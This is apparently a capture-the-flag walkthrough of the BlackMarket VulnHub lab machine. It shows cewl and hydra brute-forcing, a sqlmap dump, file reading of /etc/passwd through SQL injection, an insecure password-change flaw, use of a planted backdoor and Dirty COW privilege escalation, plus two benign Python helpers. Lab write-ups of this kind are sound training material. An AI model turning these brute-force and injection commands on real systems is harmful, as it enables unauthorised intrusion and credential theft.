Target machine pentest (blackmarket)

Introduction

https://www.vulnhub.com/entry/blackmarket-1,223/ The box description says there are 6 flags, and each flag has a hint... Personally I felt this one needed a lot of guesswork... I did it following a writeup..

IP and ports

IP: 192.168.1.106, ports

flag1

Go to port 80; the page source gives flag1

flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

Base64-decode it to get CIA - Operation Treadstone. Searched it and found it's a movie.... Guessing we need to find usernames to brute-force... too lazy to look, went straight to the writeup.... The writeup uses cewl to build the password list

cewl -w cewl.txt http://bourne.wikia.com/wiki/Operation_Treadstone

Then brute-force with hydra, but the target there is FTP; more on that later

flag3

Back to port 80, run dirb

---- Scanning URL: http://192.168.1.106/ ----
==> DIRECTORY: http://192.168.1.106/admin/
==> DIRECTORY: http://192.168.1.106/css/
==> DIRECTORY: http://192.168.1.106/db/
==> DIRECTORY: http://192.168.1.106/dist/
+ http://192.168.1.106/index.php (CODE:200SIZE:2433)
+ http://192.168.1.106/server-status (CODE:403SIZE:293)
==> DIRECTORY: http://192.168.1.106/squirrelmail/
==> DIRECTORY: http://192.168.1.106/supplier/
==> DIRECTORY: http://192.168.1.106/upload/
==> DIRECTORY: http://192.168.1.106/user/
==> DIRECTORY: http://192.168.1.106/vendor/

Brute-force the login page with hydra; the writeup just puts three usernames in the list: user, supplier, admin.... No idea why they thought of those...

blacsheep@kali:~$ hydra -L username.txt -P /home/blacsheep/Tools/WebSecurity/dict/passwords/common/Top196-probable.txt -e nsr -t 64 192.168.1.106 http-post-form "/login.php:username=^USER^&password=^PASS^:failed"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-06 16:44:39
[DATA] max 64 tasks per 1 server, overall 64 tasks, 597 login tries (l:3/p:199), ~10 tries per task
[DATA] attacking http-post-form://192.168.1.106:80//login.php:username=^USER^&password=^PASS^:failed
[80][http-post-form] host: 192.168.1.106 login: supplier password: supplier
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-10-06 16:44:51

Got the credentials supplier/supplier. Logged in, casually tested and found an injection... Ran sqlmap on it, and it is really slow...

sqlmap -u "http://192.168.1.106/supplier/edit_product.php?id=16" --cookie="PHPSESSID=ddqpnve2g6ptetfu39b5kdoj24" -o -D BlackMarket -T flag --dump

Dumping the database was too slow, so I just used someone else's screenshot

flag2

Found that the injection can read files; reading /etc/passwd reveals the FTP user nicky

root:x:0:0:root:/root:/bin/bash
...
dimitri:x:1000:1000:,,,:/home/dimitri:/bin/bash
jbourne:x:1001:1001::/var/www/html/jbourne:
nicky:x:1002:1002:,,,:/home/nicky:/bin/ftponly
ftp:x:112:120:ftp daemon,,,:/srv/ftp:/bin/false
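That passwd snippet is also a small account-audit exercise: besides nicky's FTP-only shell, jbourne has an empty shell field (which login falls back to /bin/sh for, per passwd(5)) and a home directory under the web root. The following is an added example (not from the original writeup) that parses the snippet above and lists the accounts a host review would want to look at; the thresholds (UID 1000 and up as "human" accounts, /var/www as the web root, the shell allow-list) are assumptions for the demo.

```python
# Added example (not from the original writeup): audit /etc/passwd entries for
# accounts that can still log in, using the snippet the injection returned.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/nologin"}

PASSWD_SNIPPET = """\
root:x:0:0:root:/root:/bin/bash
...
dimitri:x:1000:1000:,,,:/home/dimitri:/bin/bash
jbourne:x:1001:1001::/var/www/html/jbourne:
nicky:x:1002:1002:,,,:/home/nicky:/bin/ftponly
ftp:x:112:120:ftp daemon,,,:/srv/ftp:/bin/false
"""

def parse_passwd(text):
    """Parse passwd(5) lines; the '...' elision and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = parts
        entries.append({
            "name": name, "uid": int(uid), "gid": int(gid), "home": home,
            # passwd(5): an empty shell field means login(1) falls back to /bin/sh
            "shell": shell or "/bin/sh", "shell_empty": shell == "",
        })
    return entries

def audit_accounts(entries, web_roots=("/var/www",), allowed_shells=("/bin/bash", "/bin/sh")):
    """Return {username: [finding, ...]} for entries worth a second look."""
    findings = {}
    for e in entries:
        notes = []
        if e["uid"] == 0 and e["name"] != "root":
            notes.append("uid 0 account other than root")
        if e["shell_empty"]:
            notes.append("empty shell field (login defaults to /bin/sh)")
        if e["uid"] >= 1000 and e["shell"] not in NOLOGIN_SHELLS:
            notes.append(f"login-capable shell {e['shell']}")
        if e["shell"] not in NOLOGIN_SHELLS and e["shell"] not in allowed_shells:
            notes.append(f"non-standard shell {e['shell']} (check it is in /etc/shells)")
        if any(e["home"].startswith(root) for root in web_roots):
            notes.append("home directory inside the web root")
        if notes:
            findings[e["name"]] = notes
    return findings

if __name__ == "__main__":
    for name, notes in audit_accounts(parse_passwd(PASSWD_SNIPPET)).items():
        print(name, "->", "; ".join(notes))
```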

Brute-force it with hydra, log in and find a file, download it

flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy} If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

flag2 hint: Congrats Proceed Further

flag4

The admin interface has user management, and the change-password function is vulnerable: you can specify which user to modify, so change the user with id=1, log in and get the flag directly. Decode it: nothing is here

flag5

Following the previous hint, log into the mailbox (jbourne:?????) and get the information

Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

HELLO Friend,

I have intercept the message from Russian's some how we are working on the same
direction, however, I couldn't able to decode the message.

<Message Begins>


Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl fhv
KzhhKzhh.qkt rm liwvi gl tvg zxxvhh.

</end>

flag5 decodes to Everything is encrypted. Decrypt the message with https://quipqiup.com/: tried Caesar first, it wasn't that; tried a substitution cipher, gave it a few extra clues and got the plaintext

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to use PassPass.jpg in order to get access
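The message does not need an online solver: it is Atbash (a<->z, b<->y, ...), a fixed substitution that no Caesar shift reproduces, which is why the Caesar attempt failed. The following is an added example (not from the original writeup) that implements both ciphers, scores each candidate plaintext by counting common English words, and picks the best decoding of the mailbox text; the small word list and the scoring rule are assumptions for the demo.

```python
# Added example (not from the original writeup): decode the mailbox message
# offline. The cipher is Atbash, which the Caesar search below cannot reach.
import re
import string

LOWER, UPPER = string.ascii_lowercase, string.ascii_uppercase
ATBASH = str.maketrans(LOWER + UPPER, LOWER[::-1] + UPPER[::-1])

def atbash(text):
    """Atbash is its own inverse, so this both encodes and decodes."""
    return text.translate(ATBASH)

def caesar(text, shift):
    """Shift letters by `shift` positions, preserving case and punctuation."""
    table = str.maketrans(LOWER + UPPER,
                          LOWER[shift:] + LOWER[:shift] + UPPER[shift:] + UPPER[:shift])
    return text.translate(table)

# Crude plaintext detector: a candidate scores one point per common English word.
COMMON_WORDS = {"the", "and", "you", "are", "this", "have", "to", "in", "if", "is",
                "not", "be", "a", "i", "it", "of", "must", "order", "get"}

def english_score(text):
    return sum(tok in COMMON_WORDS for tok in re.findall(r"[a-z]+", text.lower()))

def best_decoding(ciphertext):
    """Try Atbash and all 25 Caesar shifts; return (method, plaintext) with the best score."""
    candidates = {"atbash": atbash(ciphertext)}
    for s in range(1, 26):
        candidates[f"caesar-{s}"] = caesar(ciphertext, s)
    name = max(candidates, key=lambda k: english_score(candidates[k]))
    return name, candidates[name]

# The intercepted message, copied from the mailbox text above.
MESSAGE = ("Sr Wrnrgir\n"
           "Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg\n"
           "dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl fhv\n"
           "KzhhKzhh.qkt rm liwvi gl tvg zxxvhh.")

if __name__ == "__main__":
    method, plaintext = best_decoding(MESSAGE)
    print(method)
    print(plaintext)
```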

flag6

This step again needs a lot of guessing... Visiting workshop gives a 404. Tried this:

for c in {a..z}; do printf "/${c}workshop/:%d\n" $(curl -s -w %{http_code} -o /dev/null 192.168.1.106/${c}workshop/); done

Found that vworkshop returns 200; go in via the directory from earlier, run strings to get the password, decode it to get the real password HailKGB. Visit backdoor.php: 404, but the page looks different. Turns out it takes a password; POST it and it is indeed the backdoor. Got flag6: flag6{Um9vdCB0aW1l}, decoded: Root time

Privilege escalation

Went straight to Dirty COW; the root password becomes dirtyCowFun, log in and get the final flag